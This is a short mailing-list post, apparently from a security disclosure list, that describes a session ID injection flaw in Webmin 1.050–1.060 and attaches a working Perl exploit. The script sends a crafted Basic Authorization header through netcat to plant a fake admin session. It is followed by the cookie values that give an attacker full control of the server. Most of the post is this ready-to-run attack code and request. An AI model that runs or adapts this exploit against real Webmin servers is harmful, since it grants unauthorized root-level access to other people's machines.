Hi all,
Attached is an exploit for the latest Webmin vulnerability. It relies on a
non-default setting (passdelay) to be enabled.
Webmin can verify user authentication by use of a session ID (SID) that is
assigned when a user successfully authenticates to Webmin. It is possible to
inject a fake SID into the session ID database by using a malicious username
containing control sequences used internally by Webmin.
This exploit simply creates a SID of 1234567890 for the user 'admin'. Then, it
is a simple case of creating a cookie in your favorite browser containing:
sid=1234567890; testing=1
Such that the Cookie HTTP header contains:
Cookie: sid=1234567890; testing=1
When the webmin server recieves this cookie, it is verified as an authentic
SID and an attacker can take complete control of the Webmin server... this is
basically root access to the box it is running on.
Cheers,
Carl
#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#
print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";
$nc="/usr/bin/netcat";
if($#ARGV == -1) {
print "Syntax:\n\t$0 hostname\n";
exit(1);
}
$hostname=$ARGV[0];
if ( ! -x $nc ) {
print "netcat not found!\n";
exit(2);
}
open(NC, "|$nc $hostname 10000 >& /dev/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);
print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
